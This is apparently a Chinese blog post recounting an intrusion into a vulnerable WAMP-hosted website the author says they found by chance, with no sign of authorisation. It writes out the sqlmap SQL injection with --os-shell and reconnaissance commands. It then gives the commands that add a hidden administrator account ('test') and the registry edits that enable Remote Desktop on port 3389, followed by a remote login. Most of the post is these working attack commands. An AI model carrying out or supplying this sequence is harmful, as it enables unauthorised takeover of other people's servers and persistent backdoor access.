前言:
无意中发现一wamp环境的漏洞网站。。这么好的条件不学习一下可惜啦。。
直接sqlmap进行注入。
sql注入
getshell
wamp集成软件,之前测试过可以使用sqlmap执行系统命令,试试--os-shell。。
ok
可以直接执行系统命令。。
whoami
ipconfig
net user
net user test 1234.. /add
net localgroup administrators test /add
netstat -an
收集几条开启3389端口的DOS命令,也不知道哪个最好用,都试试吧。。
reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fSingleSessionPerUser /t REG_DWORD /d 0 /f
REG ADD "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x00000d3d /f
REG ADD "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
添加用户
3389
远程连接。。mstsc
success
网友评论